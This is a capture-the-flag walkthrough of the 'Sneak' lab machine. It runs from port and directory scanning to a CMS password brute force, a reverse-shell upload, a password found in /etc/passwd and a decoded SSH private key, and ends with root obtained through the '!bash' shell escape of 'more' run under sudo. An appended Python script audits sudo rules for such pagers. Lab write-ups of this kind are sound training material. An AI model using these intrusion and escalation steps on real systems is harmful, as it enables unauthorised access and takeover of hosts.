Sneak

Target description

QQ group: 660930334

I. Host discovery

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 19:04 CST
Nmap scan report for 192.168.2.1
Host is up (0.00052s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0011s latency).
MAC Address: 08:00:27:4E:1A:DF (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.57
Host is up (0.00085s latency).
MAC Address: 08:00:27:42:27:37 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.01 seconds

Target IP: 192.168.2.57

II. Port scanning

1. Full port scan

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# nmap --min-rate 10000 -p- 192.168.2.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 19:05 CST
Nmap scan report for 192.168.2.57
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:42:27:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 44.82 seconds

Open ports: 22, 80

2. Service and version scan

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 19:06 CST
Nmap scan report for 192.168.2.57
Host is up (0.00092s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:42:27:37 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds

3. UDP port scan

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# nmap -sU --top-ports 100 192.168.2.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-14 21:30 CST
Nmap scan report for 192.168.2.57
Host is up (0.0011s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:42:27:37 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 104.56 seconds

No open UDP ports found.

III. Web penetration

Visiting port 80 shows a single page with nothing of interest.

1. Directory scanning

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# gobuster dir -u http://192.168.2.57/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.57/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 6]
/.html (Status: 403) [Size: 277]
/cms (Status: 301) [Size: 310] [--> http://192.168.2.57/cms/]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

A /cms directory was found; visiting it returns a 500 error.

Directory scanning again with /cms as the base path:

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# dirsearch -u "http://192.168.2.57/cms"
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /miao/maze-sec/sneak/reports/http_192.168.2.57/_cms_25-07-14_21-33-40.txt

Target: http://192.168.2.57/

[21:33:40] Starting: cms/
[21:33:42] 200 - 413B - /cms/.gitignore
[21:33:42] 403 - 277B - /cms/.ht_wsr.txt
[21:33:42] 403 - 277B - /cms/.htaccess.bak1
[21:33:42] 403 - 277B - /cms/.htaccess.sample
[21:33:42] 403 - 277B - /cms/.htaccess.orig
[21:33:42] 403 - 277B - /cms/.htaccess.save
[21:33:42] 403 - 277B - /cms/.htaccess_extra
[21:33:42] 403 - 277B - /cms/.htaccess_orig
[21:33:42] 403 - 277B - /cms/.htaccess_sc
[21:33:42] 403 - 277B - /cms/.htaccessBAK
[21:33:42] 403 - 277B - /cms/.htaccessOLD
[21:33:42] 403 - 277B - /cms/.htaccessOLD2
[21:33:42] 403 - 277B - /cms/.htm
[21:33:42] 403 - 277B - /cms/.html
[21:33:42] 403 - 277B - /cms/.htpasswd_test
[21:33:42] 403 - 277B - /cms/.htpasswds
[21:33:42] 403 - 277B - /cms/.httr-oauth
[21:33:44] 403 - 277B - /cms/.php
[21:34:05] 200 - 0B - /cms/config.php
[21:34:06] 301 - 318B - /cms/content -> http://192.168.2.57/cms/content/
[21:34:06] 200 - 0B - /cms/content/
[21:34:07] 301 - 315B - /cms/core -> http://192.168.2.57/cms/core/
[21:34:17] 301 - 318B - /cms/install -> http://192.168.2.57/cms/install/
[21:34:17] 200 - 543B - /cms/install/
[21:34:17] 200 - 543B - /cms/install/index.php?upgrade/
[21:34:19] 301 - 314B - /cms/lib -> http://192.168.2.57/cms/lib/
[21:34:19] 200 - 0B - /cms/lib/
[21:34:20] 200 - 2KB - /cms/license.txt
[21:34:25] 301 - 318B - /cms/modules -> http://192.168.2.57/cms/modules/
[21:34:25] 200 - 0B - /cms/modules/
[21:34:36] 200 - 1KB - /cms/README.md
[21:34:37] 200 - 90B - /cms/robots.txt
[21:34:44] 301 - 317B - /cms/styles -> http://192.168.2.57/cms/styles/

Task Completed

A login form is found at /cms/acp.

2. Password brute force

Brute-forcing the login yields the credentials admin:88888888.

3. File upload

After logging in, modify the allowed upload file types.

Upload a reverse shell script; the uploaded file is served at http://192.168.2.57/cms/content/files/rev.php.

4. Obtaining www-data access

www-data@Sneak:/var/www/html/cms/content/files$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

IV. Obtaining user access

Checking /etc/passwd, the comment (GECOS) field of the user account reveals the password user@123.

www-data@Sneak:/home/user$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
user:x:1001:1001:user@123:/home/user:/bin/bash
sysadm:x:1002:1003:Where is my license?:/home/sysadm:/bin/bash

Switching to user:

www-data@Sneak:/home/user$ su user
Password:
user@Sneak:~$ id
uid=1001(user) gid=1001(user) groups=1001(user)

USER FLAG

user@Sneak:~$ cat user.txt 
flag{user-9fcae37cb857fb5fc6f8d74c82a5d0ga}

V. Privilege escalation

1. Obtaining sysadm access

/etc/passwd contains the hint sysadm:x:1002:1003:Where is my license?:/home/sysadm:/bin/bash, and /cms/license.txt, found earlier by dirsearch, turns out to hold a private key.

┌──(root㉿kali)-[/miao/Maze-sec/sneak]
└─# curl http://192.168.2.57/cms/license.txt
-----YEK ETAVIRP HSSNEPO NIGEB-----
...(middle omitted)...
==wBGUABDIQArFWZuNFQtRWYzl3cMAAAAkn2WUqipD5tU8
-----END OPENSSH PRIVATE KEY-----

The private key is malformed (the header reads backwards); comparing it with a valid OpenSSH key shows that the odd-numbered lines have been reversed character by character and need to be flipped back, while the even-numbered lines are intact.

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# awk 'NR%2==1{for(i=length;i>0;i--)printf "%s", substr($0,i,1); print ""}
NR%2==0{print}' license.txt > sysadm.key

This yields the correct private key:

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# cat sysadm.key
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Logging in with the recovered key:

┌──(root㉿kali)-[/miao/maze-sec/sneak]
└─# ssh sysadm@192.168.2.57 -i sysadm.key
Warning: Permanently added '192.168.2.57' (ED25519) to the list of known hosts.
Linux Sneak 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sysadm@Sneak:~$ id
uid=1002(sysadm) gid=1003(sysadm) groups=1003(sysadm)

2. Privilege escalation via more

sudo -l shows that sysadm may run more on one specific file as root without a password:

sysadm@Sneak:~$ sudo -l
Matching Defaults entries for sysadm on Sneak:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sysadm may run the following commands on Sneak:
(ALL) NOPASSWD: /usr/bin/more /var/log/custom/fake-cleanup.sh

However, the file is only two lines long, so more never pauses for pagination and exits without offering the prompt from which a shell could be spawned:

sysadm@Sneak:~$ /usr/bin/more /var/log/custom/fake-cleanup.sh
# System cleanup script - DO NOT MODIFY
#

Method 1: blocking via a pipe

Feeding more through a pipe keeps it waiting at its prompt; typing !bash there is enough to escalate.

sysadm@Sneak:~$ echo miao | sudo /usr/bin/more /var/log/custom/fake-cleanup.sh
miao
!bash
root@Sneak:/home/sysadm# id
uid=0(root) gid=0(root) groups=0(root)

Method 2: shrinking the terminal with stty

Set the terminal height to two rows with stty rows 2, so that even the two-line file has to be paged:

sysadm@Sneak:~$ stty rows 2
sysadm@Sneak:~$ sudo /usr/bin/more /var/log/custom/fake-cleanup.sh
# System cleanup script - DO NOT MODIFY
!bash
root@Sneak:/home/sysadm# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

root@Sneak:~# cat root.txt 
flag{root-36bee2f8db4943b0f6c9d16afe11d454}

Summary

1. SSH private key

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcnN
...(middle omitted)...
-----END OPENSSH PRIVATE KEY-----

2. Privilege escalation via more

Behaviour of more:

  • While paused at a page break, more accepts a number of commands; those beginning with ! are executed in a shell.
  • For example, entering !/bin/bash starts an interactive shell running as the same user as more, here root via sudo.

When the file has too few lines to trigger pagination, a pause can still be forced by:

  • blocking on a pipe: echo xxxx | sudo more
  • shrinking the terminal with stty
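As an added example (not part of the original writeup), the following Python audit parses `sudo -l` output and flags rules that grant another user a pager with a `!` shell escape, the misconfiguration exploited above. The sample output is constructed from the rule shown in the writeup plus one benign rule, and the set of flagged pagers is an assumption of the example.

```python
import re

# Constructed sample of `sudo -l` output: the writeup's rule plus one benign rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for sysadm on Sneak:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User sysadm may run the following commands on Sneak:
    (ALL) NOPASSWD: /usr/bin/more /var/log/custom/fake-cleanup.sh
    (root) /usr/bin/systemctl status nginx
"""

# Pagers whose prompt accepts "!command" and spawns a shell as the pager's user.
# `more` is the one exercised in the writeup; `less` has the same escape (assumption: not exhaustive).
SHELL_ESCAPE_PAGERS = {"more", "less"}

# One command line of `sudo -l`: "(runas[:group]) [TAG: ...] /path/cmd [args][, /path/cmd2 ...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>/.*)$")


def parse_sudo_rules(text):
    """Return one dict per command listed under 'may run the following commands'."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        m = RULE_RE.match(line) if in_commands else None
        if not m:
            continue
        tags = {t.strip(": ") for t in m.group("tags").split() if t.strip(": ")}
        for entry in m.group("cmds").split(","):          # several commands may share one line
            parts = entry.strip().split(None, 1)
            rules.append({"runas": m.group("runas"), "nopasswd": "NOPASSWD" in tags,
                          "cmd": parts[0], "args": parts[1] if len(parts) > 1 else ""})
    return rules


def find_pager_escapes(rules):
    """Flag rules that hand a shell-escaping pager to another user. Pinning the file argument
    does not mitigate this: '!' at the pager prompt is independent of what is being paged."""
    findings = []
    for r in rules:
        if r["cmd"].rsplit("/", 1)[-1] in SHELL_ESCAPE_PAGERS:
            findings.append(dict(r, reason="pager with '!' shell escape; drop the rule or replace "
                                           "the pager with a non-interactive tool such as cat"))
    return findings


if __name__ == "__main__":
    for f in find_pager_escapes(parse_sudo_rules(SAMPLE_SUDO_L)):
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"[!] ({f['runas']}) {tag}{f['cmd']} {f['args']}: {f['reason']}")
```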

Sneak
http://miao-sec.github.io/Maze-sec/Sneak/
Author: Miao
Published: 15 July 2025
License: BY-MIAO